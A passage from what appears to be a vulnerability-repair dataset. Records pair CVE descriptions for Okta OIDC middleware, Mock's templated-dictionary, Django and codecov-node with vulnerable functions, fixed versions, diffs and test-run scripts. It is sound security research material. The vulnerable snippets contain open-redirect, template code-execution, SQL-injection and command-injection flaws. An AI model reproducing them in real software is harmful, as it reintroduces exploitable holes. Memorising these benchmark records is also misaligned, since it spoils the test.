@@\n+ def user_exists(self, username):\n+ \"\"\"\n+ Check if a user actually exists in the database.\n+\n+ :param username:\n+ :return: boolean\n+ \"\"\"\n+ return self.pyload.db.user_exists(username)\n\n--- /dev/null\n+++ b/src/pyload/webui/app/helpers.py\n@@ -0,0 +1,4 @@\n+ @style.queue\n+ def user_exists(self, user):\n+ self.c.execute(\"SELECT name FROM users WHERE name=?\", (user,))\n+ return self.c.fetchone() is not None\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2022-3145", "cve_description": "An open redirect vulnerability exists in Okta OIDC Middleware prior to version 5.0.0 allowing an attacker to redirect a user to an arbitrary URL.", "cwe_info": {"CWE-601": {"name": "URL Redirection to Untrusted Site ('Open Redirect')", "description": "The web application accepts a user-controlled input that specifies a link to an external site, and uses that link in a redirect."}}, "repo": "https://github.com/okta/okta-oidc-middleware", "patch_url": ["https://github.com/okta/okta-oidc-middleware/commit/5d10b3ccdd5d6893de4d8b58696094267d30c113"], "programing_language": "JavaScript", "vul_func": [{"id": "vul_js_212_1", "commit": "fe24bfc", "file_path": "src/oidcUtil.js", "start_line": 135, "end_line": 160, "snippet": "oidcUtil.ensureAuthenticated = (context, options = {}) => {\n return (req, res, next) => {\n const isAuthenticated = req.isAuthenticated && req.isAuthenticated();\n if (isAuthenticated) {\n return next();\n }\n const negotiator = new Negotiator(req);\n if (negotiator.mediaType() === 'text/html') {\n if (!isAuthenticated) {\n if (req.session) {\n req.session.returnTo = req.originalUrl || req.url;\n }\n let url = options.redirectTo;\n if (!url) {\n const loginPath = context.options.routes.login.path;\n url = (new URL(loginPath[0] === '/' ? `.${loginPath}` : `/${loginPath}`, context.options.appBaseUrl + '/')).href;\n }\n return res.redirect(appendOptionsToQuery(url, options));\n }\n\n next();\n } else {\n res.sendStatus(401);\n }\n };\n};"}], "fix_func": [{"id": "fix_js_212_1", "commit": "5d10b3ccdd5d6893de4d8b58696094267d30c113", "file_path": "src/oidcUtil.js", "start_line": 135, "end_line": 161, "snippet": "oidcUtil.ensureAuthenticated = (context, options = {}) => {\n return (req, res, next) => {\n const isAuthenticated = req.isAuthenticated && req.isAuthenticated();\n if (isAuthenticated) {\n return next();\n }\n const negotiator = new Negotiator(req);\n if (negotiator.mediaType() === 'text/html') {\n if (!isAuthenticated) {\n if (req.session) {\n // collapse any leading slashes to a single slash to prevent open redirects (OKTA-499372)\n req.session.returnTo = (req.originalUrl || req.url).replace(/^\\/+/, '/');\n }\n let url = options.redirectTo;\n if (!url) {\n const loginPath = context.options.routes.login.path;\n url = (new URL(loginPath[0] === '/' ? `.${loginPath}` : `/${loginPath}`, context.options.appBaseUrl + '/')).href;\n }\n return res.redirect(appendOptionsToQuery(url, options));\n }\n\n next();\n } else {\n res.sendStatus(401);\n }\n };\n};"}], "vul_patch": "--- a/src/oidcUtil.js\n+++ b/src/oidcUtil.js\n@@ -8,7 +8,8 @@\n if (negotiator.mediaType() === 'text/html') {\n if (!isAuthenticated) {\n if (req.session) {\n- req.session.returnTo = req.originalUrl || req.url;\n+ // collapse any leading slashes to a single slash to prevent open redirects (OKTA-499372)\n+ req.session.returnTo = (req.originalUrl || req.url).replace(/^\\/+/, '/');\n }\n let url = options.redirectTo;\n if (!url) {\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2023-6395", "cve_description": "The Mock software contains a vulnerability wherein an attacker could potentially exploit privilege escalation, enabling the execution of arbitrary code with root user privileges. This weakness stems from the absence of proper sandboxing during the expansion and execution of Jinja2 templates, which may be included in certain configuration parameters. While the Mock documentation advises treating users added to the mock group as privileged, certain build systems invoking mock on behalf of users might inadvertently permit less privileged users to define configuration tags. These tags could then be passed as parameters to mock during execution, potentially leading to the utilization of Jinja2 templates for remote privilege escalation and the execution of arbitrary code as the root user on the build server.", "cwe_info": {"CWE-94": {"name": "Improper Control of Generation of Code ('Code Injection')", "description": "The product constructs all or part of a code segment using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the syntax or behavior of the intended code segment."}, "CWE-77": {"name": "Improper Neutralization of Special Elements used in a Command ('Command Injection')", "description": "The product constructs all or part of a command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended command when it is sent to a downstream component."}, "CWE-78": {"name": "Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')", "description": "The product constructs all or part of an OS command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended OS command when it is sent to a downstream component."}}, "repo": "https://github.com/xsuchy/templated-dictionary", "patch_url": ["https://github.com/xsuchy/templated-dictionary/commit/bcd90f0dafa365575c4b101e6f5d98c4ef4e4b69", "https://github.com/xsuchy/templated-dictionary/commit/0740bd0ca8d487301881541028977d120f8b8933"], "programing_language": "Python", "vul_func": [{"id": "vul_py_386_1", "commit": "11ecb712ac9c240ebda6c5c784023f3f22f5bd02", "file_path": "templated_dictionary/__init__.py", "start_line": 11, "end_line": 26, "snippet": " def __init__(self, *args, alias_spec=None, **kwargs):\n '''\n Use the object dict.\n\n Optional parameter 'alias_spec' is dictionary of form:\n {'aliased_to': ['alias_one', 'alias_two', ...], ...}\n When specified, and one of the aliases is accessed - the\n 'aliased_to' config option is returned.\n '''\n self.__dict__.update(*args, **kwargs)\n\n self._aliases = {}\n if alias_spec:\n for aliased_to, aliases in alias_spec.items():\n for alias in aliases:\n self._aliases[alias] = aliased_to"}, {"id": "vul_py_386_2", "commit": "11ecb712ac9c240ebda6c5c784023f3f22f5bd02", "file_path": "templated_dictionary/__init__.py", "start_line": 79, "end_line": 88, "snippet": " def __render_string(self, value):\n orig = last = value\n max_recursion = self.__dict__.get('jinja_max_recursion', 5)\n for _ in range(max_recursion):\n template = jinja2.Template(value, keep_trailing_newline=True)\n value = _to_native(template.render(self.__dict__))\n if value == last:\n return value\n last = value\n raise ValueError(\"too deep jinja re-evaluation on '{}'\".format(orig))"}], "fix_func": [{"id": "fix_py_386_1", "commit": "bcd90f0dafa365575c4b101e6f5d98c4ef4e4b69", "file_path": "templated_dictionary/__init__.py", "start_line": 11, "end_line": 28, "snippet": " def __init__(self, *args, alias_spec=None, **kwargs):\n '''\n Use the object dict.\n\n Optional parameter 'alias_spec' is dictionary of form:\n {'aliased_to': ['alias_one', 'alias_two', ...], ...}\n When specified, and one of the aliases is accessed - the\n 'aliased_to' config option is returned.\n '''\n self.__dict__.update(*args, **kwargs)\n\n self.sandbox = sandbox.SandboxedEnvironment(keep_trailing_newline=True)\n\n self._aliases = {}\n if alias_spec:\n for aliased_to, aliases in alias_spec.items():\n for alias in aliases:\n self._aliases[alias] = aliased_to"}, {"id": "fix_py_386_2", "commit": "bcd90f0dafa365575c4b101e6f5d98c4ef4e4b69", "file_path": "templated_dictionary/__init__.py", "start_line": 81, "end_line": 89, "snippet": " def __render_string(self, value):\n orig = last = value\n max_recursion = self.__dict__.get('jinja_max_recursion', 5)\n for _ in range(max_recursion):\n value = _to_native(self.sandbox.from_string(value).render(self.__dict__, func=lambda:None))\n if value == last:\n return value\n last = value\n raise ValueError(\"too deep jinja re-evaluation on '{}'\".format(orig))"}], "vul_patch": "--- a/templated_dictionary/__init__.py\n+++ b/templated_dictionary/__init__.py\n@@ -9,6 +9,8 @@\n '''\n self.__dict__.update(*args, **kwargs)\n \n+ self.sandbox = sandbox.SandboxedEnvironment(keep_trailing_newline=True)\n+\n self._aliases = {}\n if alias_spec:\n for aliased_to, aliases in alias_spec.items():\n\n--- a/templated_dictionary/__init__.py\n+++ b/templated_dictionary/__init__.py\n@@ -2,8 +2,7 @@\n orig = last = value\n max_recursion = self.__dict__.get('jinja_max_recursion', 5)\n for _ in range(max_recursion):\n- template = jinja2.Template(value, keep_trailing_newline=True)\n- value = _to_native(template.render(self.__dict__))\n+ value = _to_native(self.sandbox.from_string(value).render(self.__dict__, func=lambda:None))\n if value == last:\n return value\n last = value\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2021-35042", "cve_description": "Django 3.1.x before 3.1.13 and 3.2.x before 3.2.5 allows QuerySet.order_by SQL injection if order_by is untrusted input from a client of a web application.", "cwe_info": {"CWE-89": {"name": "Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')", "description": "The product constructs all or part of an SQL command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended SQL command when it is sent to a downstream component. Without sufficient removal or quoting of SQL syntax in user-controllable inputs, the generated SQL query can cause those inputs to be interpreted as SQL instead of ordinary user data."}}, "repo": "https://github.com/django/django", "patch_url": ["https://github.com/django/django/commit/0bd57a879a0d54920bb9038a732645fb917040e9", "https://github.com/django/django/commit/dae83a24519d6f284c74414e0b81d64d9b5a0db4", "https://github.com/django/django/commit/a34a5f724c5d5adb2109374ba3989ebb7b11f81f"], "programing_language": "Python", "vul_func": [{"id": "vul_py_5_1", "commit": "8dc1cc0", "file_path": "django/db/models/sql/query.py", "start_line": 1888, "end_line": 1932, "snippet": " def add_ordering(self, *ordering):\n \"\"\"\n Add items from the 'ordering' sequence to the query's \"order by\"\n clause. These items are either field names (not column names) --\n possibly with a direction prefix ('-' or '?') -- or OrderBy\n expressions.\n\n If 'ordering' is empty, clear all ordering from the query.\n \"\"\"\n errors = []\n for item in ordering:\n if isinstance(item, str):\n if '.' in item:\n warnings.warn(\n 'Passing column raw column aliases to order_by() is '\n 'deprecated. Wrap %r in a RawSQL expression before '\n 'passing it to order_by().' % item,\n category=RemovedInDjango40Warning,\n stacklevel=3,\n )\n continue\n if item == '?':\n continue\n if item.startswith('-'):\n item = item[1:]\n if item in self.annotations:\n continue\n if self.extra and item in self.extra:\n continue\n # names_to_path() validates the lookup. A descriptive\n # FieldError will be raise if it's not.\n self.names_to_path(item.split(LOOKUP_SEP), self.model._meta)\n elif not hasattr(item, 'resolve_expression'):\n errors.append(item)\n if getattr(item, 'contains_aggregate', False):\n raise FieldError(\n 'Using an aggregate in order_by() without also including '\n 'it in annotate() is not allowed: %s' % item\n )\n if errors:\n raise FieldError('Invalid order_by arguments: %s' % errors)\n if ordering:\n self.order_by += ordering\n else:\n self.default_ordering = False"}], "fix_func": [{"id": "fix_py_5_1", "commit": "0bd57a879a0d54920bb9038a732645fb917040e9", "file_path": "django/db/models/sql/query.py", "start_line": 1890, "end_line": 1934, "snippet": " def add_ordering(self, *ordering):\n \"\"\"\n Add items from the 'ordering' sequence to the query's \"order by\"\n clause. These items are either field names (not column names) --\n possibly with a direction prefix ('-' or '?') -- or OrderBy\n expressions.\n\n If 'ordering' is empty, clear all ordering from the query.\n \"\"\"\n errors = []\n for item in ordering:\n if isinstance(item, str):\n if '.' in item and ORDER_PATTERN.match(item):\n warnings.warn(\n 'Passing column raw column aliases to order_by() is '\n 'deprecated. Wrap %r in a RawSQL expression before '\n 'passing it to order_by().' % item,\n category=RemovedInDjango40Warning,\n stacklevel=3,\n )\n continue\n if item == '?':\n continue\n if item.startswith('-'):\n item = item[1:]\n if item in self.annotations:\n continue\n if self.extra and item in self.extra:\n continue\n # names_to_path() validates the lookup. A descriptive\n # FieldError will be raise if it's not.\n self.names_to_path(item.split(LOOKUP_SEP), self.model._meta)\n elif not hasattr(item, 'resolve_expression'):\n errors.append(item)\n if getattr(item, 'contains_aggregate', False):\n raise FieldError(\n 'Using an aggregate in order_by() without also including '\n 'it in annotate() is not allowed: %s' % item\n )\n if errors:\n raise FieldError('Invalid order_by arguments: %s' % errors)\n if ordering:\n self.order_by += ordering\n else:\n self.default_ordering = False"}, {"id": "fix_py_5_2", "commit": "0bd57a879a0d54920bb9038a732645fb917040e9", "file_path": "django/db/models/sql/constants.py", "start_line": 22, "end_line": 22, "snippet": "ORDER_PATTERN = _lazy_re_compile(r'[-+]?[.\\w]+$')"}], "vul_patch": "--- a/django/db/models/sql/query.py\n+++ b/django/db/models/sql/query.py\n@@ -10,7 +10,7 @@\n errors = []\n for item in ordering:\n if isinstance(item, str):\n- if '.' in item:\n+ if '.' in item and ORDER_PATTERN.match(item):\n warnings.warn(\n 'Passing column raw column aliases to order_by() is '\n 'deprecated. Wrap %r in a RawSQL expression before '\n\n--- /dev/null\n+++ b/django/db/models/sql/query.py\n@@ -0,0 +1 @@\n+ORDER_PATTERN = _lazy_re_compile(r'[-+]?[.\\w]+$')\n\n", "poc_test_cmd": "#!/bin/bash\n# From ghcr.io/anonymous2578-data/cve-2021-35042:latest\n# bash /workspace/fix-run.sh\nset -e\n\ncd /workspace/django\ngit apply --whitespace=nowarn /workspace/test.patch /workspace/fix.patch\ncd tests && /workspace/PoC_env/CVE-2021-35042/bin/python ./runtests.py queries.tests.QuerySetExceptionTests.test_order_by_escape_prevention\n", "unit_test_cmd": "#!/bin/bash\n# From ghcr.io/anonymous2578-data/cve-2021-35042:latest\n# bash /workspace/unit_test.sh\nset -e\n\ncd /workspace/django\ngit apply --whitespace=nowarn /workspace/fix.patch\ncd tests && /workspace/PoC_env/CVE-2021-35042/bin/python ./runtests.py queries.tests\n"} {"cve_id": "CVE-2020-7597", "cve_description": "codecov-node npm module before 3.6.5 allows remote attackers to execute arbitrary commands.The value provided as part of the gcov-root argument is executed by the exec function within lib/codecov.js. This vulnerability exists due to an incomplete fix of CVE-2020-7596.", "cwe_info": {"CWE-94": {"name": "Improper Control of Generation of Code ('Code Injection')", "description": "The product constructs all or part of a code segment using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the syntax or behavior of the intended code segment."}, "CWE-77": {"name": "Improper Neutralization of Special Elements used in a Command ('Command Injection')", "description": "The product constructs all or part of a command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended command when it is sent to a downstream component."}, "CWE-78": {"name": "Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')", "description": "The product constructs all or part of an OS command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended OS command when it is sent to a downstream component."}}, "repo": "https://github.com/codecov/codecov-node", "patch_url": ["https://github.com/codecov/codecov-node/commit/02cf13d8b93ac547b5b4c2cfe186b7d874fd234f"], "programing_language": "JavaScript", "vul_func": [{"id": "vul_js_204_1", "commit": "bac0787", "file_path": "lib/codecov.js", "start_line": 239, "end_line": 557, "snippet": "var upload = function(args, on_success, on_failure) {\n // Build query\n var codecov_endpoint =\n args.options.url ||\n process.env.codecov_url ||\n process.env.CODECOV_URL ||\n 'https://codecov.io'\n var query = {}\n var debug = []\n var yamlFile =\n args.options.yml ||\n process.env.codecov_yml ||\n process.env.CODECOV_YML ||\n 'codecov.yml'\n\n console.log(\n '' +\n ' _____ _ \\n' +\n ' / ____| | | \\n' +\n '| | ___ __| | ___ ___ _____ __ \\n' +\n '| | / _ \\\\ / _` |/ _ \\\\/ __/ _ \\\\ \\\\ / / \\n' +\n '| |___| (_) | (_| | __/ (_| (_) \\\\ V / \\n' +\n ' \\\\_____\\\\___/ \\\\__,_|\\\\___|\\\\___\\\\___/ \\\\_/ \\n' +\n ' ' +\n version\n )\n\n if ((args.options.disable || '').split(',').indexOf('detect') === -1) {\n console.log('==> Detecting CI Provider')\n query = detectProvider()\n } else {\n debug.push('disabled detect')\n }\n\n query.yaml = [yamlFile, '.codecov.yml'].reduce(function(result, file) {\n return (\n result ||\n (fs.existsSync(path.resolve(process.cwd(), file))\n ? path.resolve(process.cwd(), file)\n : undefined)\n )\n }, undefined)\n\n if (args.options.build) {\n query.build = args.options.build\n }\n\n if (args.options.commit) {\n query.commit = args.options.commit\n }\n\n if (args.options.branch) {\n query.branch = args.options.branch\n }\n\n if (args.options.slug) {\n query.slug = args.options.slug\n }\n\n var flags =\n args.options.flags || process.env.codecov_flags || process.env.CODECOV_FLAGS\n if (flags) {\n query.flags = flags\n }\n\n var yamlToken\n try {\n var loadedYamlFile = jsYaml.safeLoad(fs.readFileSync(query.yaml, 'utf8'))\n yamlToken =\n loadedYamlFile && loadedYamlFile.codecov && loadedYamlFile.codecov.token\n } catch (e) {\n // silently fail\n }\n var token =\n args.options.token ||\n yamlToken ||\n process.env.codecov_token ||\n process.env.CODECOV_TOKEN\n if (token) {\n query.token = token\n }\n\n query.package = 'node-' + version\n\n console.log('==> Configuration: ')\n console.log(' Endpoint: ' + codecov_endpoint)\n // Don't output `query` directly as it contains the upload token\n console.log({\n commit: query.commit,\n branch: query.branch,\n package: query.package,\n })\n\n var upload = ''\n\n // Add specified env vars\n var env_found = false\n if (args.options.env || process.env.CODECOV_ENV || process.env.codecov_env) {\n var env = (\n args.options.env +\n ',' +\n (process.env.CODECOV_ENV || '') +\n ',' +\n (process.env.codecov_env || '')\n ).split(',')\n for (var i = env.length - 1; i >= 0; i--) {\n if (env[i]) {\n upload += env[i] + '=' + (process.env[env[i]] || '').toString() + '\\n'\n env_found = true\n }\n }\n if (env_found) {\n upload += '<<<<<< ENV\\n'\n }\n }\n\n // List git files\n var root = path.resolve(args.options.root || query.root || '.')\n console.log('==> Building file structure')\n try {\n upload +=\n execSync('git ls-files || hg locate', { cwd: root })\n .toString()\n .trim() + '\\n<<<<<< network\\n'\n } catch (err) {\n // not a git/hg dir, emulating git/hg ignore behavior\n upload +=\n walk\n .sync({ path: root, ignoreFiles: ['.gitignore', '.hgignore'] })\n .join('\\n')\n .trim() + '\\n<<<<<< network\\n'\n }\n // Make gcov reports\n if ((args.options.disable || '').split(',').indexOf('gcov') === -1) {\n try {\n console.log('==> Generating gcov reports (skip via --disable=gcov)')\n var gcg = args.options['gcov-glob'] || ''\n if (gcg) {\n if (!isWindows) {\n gcg = gcg\n .split(' ')\n .map(function(p) {\n return \"-not -path '\" + p + \"'\"\n })\n .join(' ')\n } else {\n gcg = gcg\n .split(' ')\n .map(function(p) {\n return '^| findstr /i /v ' + p\n })\n .join(' ')\n }\n }\n var gcov\n if (!isWindows) {\n gcov =\n 'find ' +\n (args.options['gcov-root'] || root) +\n \" -type f -name '*.gcno' \" +\n gcg +\n ' -exec ' +\n (validator.escape(args.options['gcov-exec']) || 'gcov') +\n ' ' +\n (validator.escape(args.options['gcov-args']) || '') +\n ' {} +'\n } else {\n // @TODO support for root\n // not straight forward due to nature of windows command dir\n gcov =\n 'for /f \"delims=\" %g in (\\'dir /a-d /b /s *.gcno ' +\n gcg +\n \"') do \" +\n (args.options['gcov-exec'] || 'gcov') +\n ' ' +\n (args.options['gcov-args'] || '') +\n ' %g'\n }\n debug.push(gcov)\n console.log(' $ ' + gcov)\n execSync(gcov)\n } catch (e) {\n console.log(' Failed to run gcov command.')\n }\n } else {\n debug.push('disabled gcov')\n }\n\n // Detect .bowerrc\n var bowerrc\n if (!isWindows) {\n bowerrc = execSync('test -f .bowerrc && cat .bowerrc || echo \"\"', {\n cwd: root,\n })\n .toString()\n .trim()\n } else {\n bowerrc = execSync('if exist .bowerrc type .bowerrc', { cwd: root })\n .toString()\n .trim()\n }\n if (bowerrc) {\n bowerrc = JSON.parse(bowerrc).directory\n if (bowerrc) {\n if (!isWindows) {\n more_patterns =\n \" -not -path '*/\" + bowerrc.toString().replace(/\\/$/, '') + \"/*'\"\n } else {\n more_patterns =\n '| findstr /i /v \\\\' + bowerrc.toString().replace(/\\/$/, '') + '\\\\'\n }\n }\n }\n\n var files = [],\n file = null\n if (args.options.pipe) {\n // Append piped reports\n upload += '# path=piped\\n' + args.options.pipe.join('') + '\\n<<<<<< EOF\\n'\n console.log('==> Reading report from stdin')\n } else if (args.options.file) {\n // Append manually entered reports\n file = args.options.file\n console.log('==> Targeting specific file')\n try {\n upload +=\n '# path=' +\n file +\n '\\n' +\n fs.readFileSync(file, 'utf8').toString() +\n '\\n<<<<<< EOF\\n'\n console.log(' + ' + file)\n files.push(file)\n } catch (e) {\n debug.push('failed: ' + file.split('/').pop())\n console.log(' X Failed to read file at ' + file)\n }\n } else if ((args.options.disable || '').split(',').indexOf('search') === -1) {\n console.log('==> Scanning for reports')\n var _files\n if (!isWindows) {\n _files = execSync('find ' + root + ' ' + patterns + more_patterns)\n .toString()\n .trim()\n .split('\\n')\n } else {\n // @TODO support for a root directory\n // It's not straightforward due to the nature of the dir command\n _files = execSync('dir ' + patterns + more_patterns)\n .toString()\n .trim()\n .split('\\r\\n')\n }\n if (_files) {\n for (var i2 = _files.length - 1; i2 >= 0; i2--) {\n file = _files[i2]\n try {\n upload +=\n '# path=' +\n file +\n '\\n' +\n fs.readFileSync(file, 'utf8').toString() +\n '\\n<<<<<< EOF\\n'\n console.log(' + ' + file)\n files.push(file)\n } catch (e) {\n debug.push('failed: ' + file.split('/').pop())\n console.log(' X Failed to read file at ' + file)\n }\n }\n }\n } else {\n debug.push('disabled search')\n }\n\n if (files) {\n // Upload to Codecov\n if (args.options.dump) {\n console.log('-------- DEBUG START --------')\n console.log(upload)\n console.log('-------- DEBUG END --------')\n } else {\n console.log('==> Uploading reports')\n var _upload\n if ((args.options.disable || '').split(',').indexOf('s3') === -1) {\n _upload = sendToCodecovV3\n } else {\n _upload = sendToCodecovV2\n }\n _upload(\n codecov_endpoint,\n query,\n upload,\n function() {\n // remove files after Uploading\n if (args.options.clear) {\n for (var i = files.length - 1; i >= 0; i--) {\n try {\n fs.unlinkSync(files[i])\n } catch (e) {}\n }\n }\n if (on_success) {\n on_success.apply(this, arguments)\n }\n },\n on_failure || function() {}\n )\n }\n }\n\n return {\n body: upload,\n files: files,\n query: query,\n debug: debug,\n url: codecov_endpoint,\n }\n}"}], "fix_func": [{"id": "fix_js_204_1", "commit": "02cf13d", "file_path": "lib/codecov.js", "start_line": 238, "end_line": 556, "snippet": "var upload = function(args, on_success, on_failure) {\n // Build query\n var codecov_endpoint =\n args.options.url ||\n process.env.codecov_url ||\n process.env.CODECOV_URL ||\n 'https://codecov.io'\n var query = {}\n var debug = []\n var yamlFile =\n args.options.yml ||\n process.env.codecov_yml ||\n process.env.CODECOV_YML ||\n 'codecov.yml'\n\n console.log(\n '' +\n ' _____ _ \\n' +\n ' / ____| | | \\n' +\n '| | ___ __| | ___ ___ _____ __ \\n' +\n '| | / _ \\\\ / _` |/ _ \\\\/ __/ _ \\\\ \\\\ / / \\n' +\n '| |___| (_) | (_| | __/ (_| (_) \\\\ V / \\n' +\n ' \\\\_____\\\\___/ \\\\__,_|\\\\___|\\\\___\\\\___/ \\\\_/ \\n' +\n ' ' +\n version\n )\n\n if ((args.options.disable || '').split(',').indexOf('detect') === -1) {\n console.log('==> Detecting CI Provider')\n query = detectProvider()\n } else {\n debug.push('disabled detect')\n }\n\n query.yaml = [yamlFile, '.codecov.yml'].reduce(function(result, file) {\n return (\n result ||\n (fs.existsSync(path.resolve(process.cwd(), file))\n ? path.resolve(process.cwd(), file)\n : undefined)\n )\n }, undefined)\n\n if (args.options.build) {\n query.build = args.options.build\n }\n\n if (args.options.commit) {\n query.commit = args.options.commit\n }\n\n if (args.options.branch) {\n query.branch = args.options.branch\n }\n\n if (args.options.slug) {\n query.slug = args.options.slug\n }\n\n var flags =\n args.options.flags || process.env.codecov_flags || process.env.CODECOV_FLAGS\n if (flags) {\n query.flags = flags\n }\n\n var yamlToken\n try {\n var loadedYamlFile = jsYaml.safeLoad(fs.readFileSync(query.yaml, 'utf8'))\n yamlToken =\n loadedYamlFile && loadedYamlFile.codecov && loadedYamlFile.codecov.token\n } catch (e) {\n // silently fail\n }\n var token =\n args.options.token ||\n yamlToken ||\n process.env.codecov_token ||\n process.env.CODECOV_TOKEN\n if (token) {\n query.token = token\n }\n\n query.package = 'node-' + version\n\n console.log('==> Configuration: ')\n console.log(' Endpoint: ' + codecov_endpoint)\n // Don't output `query` directly as it contains the upload token\n console.log({\n commit: query.commit,\n branch: query.branch,\n package: query.package,\n })\n\n var upload = ''\n\n // Add specified env vars\n var env_found = false\n if (args.options.env || process.env.CODECOV_ENV || process.env.codecov_env) {\n var env = (\n args.options.env +\n ',' +\n (process.env.CODECOV_ENV || '') +\n ',' +\n (process.env.codecov_env || '')\n ).split(',')\n for (var i = env.length - 1; i >= 0; i--) {\n if (env[i]) {\n upload += env[i] + '=' + (process.env[env[i]] || '').toString() + '\\n'\n env_found = true\n }\n }\n if (env_found) {\n upload += '<<<<<< ENV\\n'\n }\n }\n\n // List git files\n var root = path.resolve(args.options.root || query.root || '.')\n console.log('==> Building file structure')\n try {\n upload +=\n execSync('git ls-files || hg locate', { cwd: root })\n .toString()\n .trim() + '\\n<<<<<< network\\n'\n } catch (err) {\n // not a git/hg dir, emulating git/hg ignore behavior\n upload +=\n walk\n .sync({ path: root, ignoreFiles: ['.gitignore', '.hgignore'] })\n .join('\\n')\n .trim() + '\\n<<<<<< network\\n'\n }\n // Make gcov reports\n if ((args.options.disable || '').split(',').indexOf('gcov') === -1) {\n try {\n console.log('==> Generating gcov reports (skip via --disable=gcov)')\n var gcg = args.options['gcov-glob'] || ''\n if (gcg) {\n if (!isWindows) {\n gcg = gcg\n .split(' ')\n .map(function(p) {\n return \"-not -path '\" + p + \"'\"\n })\n .join(' ')\n } else {\n gcg = gcg\n .split(' ')\n .map(function(p) {\n return '^| findstr /i /v ' + p\n })\n .join(' ')\n }\n }\n var gcov\n if (!isWindows) {\n gcov =\n 'find ' +\n (sanitizeVar(args.options['gcov-root']) || root) +\n \" -type f -name '*.gcno' \" +\n gcg +\n ' -exec ' +\n (sanitizeVar(args.options['gcov-exec']) || 'gcov') +\n ' ' +\n (sanitizeVar(args.options['gcov-args']) || '') +\n ' {} +'\n } else {\n // @TODO support for root\n // not straight forward due to nature of windows command dir\n gcov =\n 'for /f \"delims=\" %g in (\\'dir /a-d /b /s *.gcno ' +\n gcg +\n \"') do \" +\n (sanitizeVar(args.options['gcov-exec']) || 'gcov') +\n ' ' +\n (sanitizeVar(args.options['gcov-args']) || '') +\n ' %g'\n }\n debug.push(gcov)\n console.log(' $ ' + gcov)\n execSync(gcov)\n } catch (e) {\n console.log(' Failed to run gcov command.')\n }\n } else {\n debug.push('disabled gcov')\n }\n\n // Detect .bowerrc\n var bowerrc\n if (!isWindows) {\n bowerrc = execSync('test -f .bowerrc && cat .bowerrc || echo \"\"', {\n cwd: root,\n })\n .toString()\n .trim()\n } else {\n bowerrc = execSync('if exist .bowerrc type .bowerrc', { cwd: root })\n .toString()\n .trim()\n }\n if (bowerrc) {\n bowerrc = JSON.parse(bowerrc).directory\n if (bowerrc) {\n if (!isWindows) {\n more_patterns =\n \" -not -path '*/\" + bowerrc.toString().replace(/\\/$/, '') + \"/*'\"\n } else {\n more_patterns =\n '| findstr /i /v \\\\' + bowerrc.toString().replace(/\\/$/, '') + '\\\\'\n }\n }\n }\n\n var files = [],\n file = null\n if (args.options.pipe) {\n // Append piped reports\n upload += '# path=piped\\n' + args.options.pipe.join('') + '\\n<<<<<< EOF\\n'\n console.log('==> Reading report from stdin')\n } else if (args.options.file) {\n // Append manually entered reports\n file = args.options.file\n console.log('==> Targeting specific file')\n try {\n upload +=\n '# path=' +\n file +\n '\\n' +\n fs.readFileSync(file, 'utf8').toString() +\n '\\n<<<<<< EOF\\n'\n console.log(' + ' + file)\n files.push(file)\n } catch (e) {\n debug.push('failed: ' + file.split('/').pop())\n console.log(' X Failed to read file at ' + file)\n }\n } else if ((args.options.disable || '').split(',').indexOf('search') === -1) {\n console.log('==> Scanning for reports')\n var _files\n if (!isWindows) {\n _files = execSync('find ' + root + ' ' + patterns + more_patterns)\n .toString()\n .trim()\n .split('\\n')\n } else {\n // @TODO support for a root directory\n // It's not straightforward due to the nature of the dir command\n _files = execSync('dir ' + patterns + more_patterns)\n .toString()\n .trim()\n .split('\\r\\n')\n }\n if (_files) {\n for (var i2 = _files.length - 1; i2 >= 0; i2--) {\n file = _files[i2]\n try {\n upload +=\n '# path=' +\n file +\n '\\n' +\n fs.readFileSync(file, 'utf8').toString() +\n '\\n<<<<<< EOF\\n'\n console.log(' + ' + file)\n files.push(file)\n } catch (e) {\n debug.push('failed: ' + file.split('/').pop())\n console.log(' X Failed to read file at ' + file)\n }\n }\n }\n } else {\n debug.push('disabled search')\n }\n\n if (files) {\n // Upload to Codecov\n if (args.options.dump) {\n console.log('-------- DEBUG START --------')\n console.log(upload)\n console.log('-------- DEBUG END --------')\n } else {\n console.log('==> Uploading reports')\n var _upload\n if ((args.options.disable || '').split(',').indexOf('s3') === -1) {\n _upload = sendToCodecovV3\n } else {\n _upload = sendToCodecovV2\n }\n _upload(\n codecov_endpoint,\n query,\n upload,\n function() {\n // remove files after Uploading\n if (args.options.clear) {\n for (var i = files.length - 1; i >= 0; i--) {\n try {\n fs.unlinkSync(files[i])\n } catch (e) {}\n }\n }\n if (on_success) {\n on_success.apply(this, arguments)\n }\n },\n on_failure || function() {}\n )\n }\n }\n\n return {\n body: upload,\n files: files,\n query: query,\n debug: debug,\n url: codecov_endpoint,\n }\n}"}], "vul_patch": "--- a/lib/codecov.js\n+++ b/lib/codecov.js\n@@ -156,13 +156,13 @@\n if (!isWindows) {\n gcov =\n 'find ' +\n- (args.options['gcov-root'] || root) +\n+ (sanitizeVar(args.options['gcov-root']) || root) +\n \" -type f -name '*.gcno' \" +\n gcg +\n ' -exec ' +\n- (validator.escape(args.options['gcov-exec']) || 'gcov') +\n+ (sanitizeVar(args.options['gcov-exec']) || 'gcov') +\n ' ' +\n- (validator.escape(args.options['gcov-args']) || '') +\n+ (sanitizeVar(args.options['gcov-args']) || '') +\n ' {} +'\n } else {\n // @TODO support for root\n@@ -171,9 +171,9 @@\n 'for /f \"delims=\" %g in (\\'dir /a-d /b /s *.gcno ' +\n gcg +\n \"') do \" +\n- (args.options['gcov-exec'] || 'gcov') +\n+ (sanitizeVar(args.options['gcov-exec']) || 'gcov') +\n ' ' +\n- (args.options['gcov-args'] || '') +\n+ (sanitizeVar(args.options['gcov-args']) || '') +\n ' %g'\n }\n 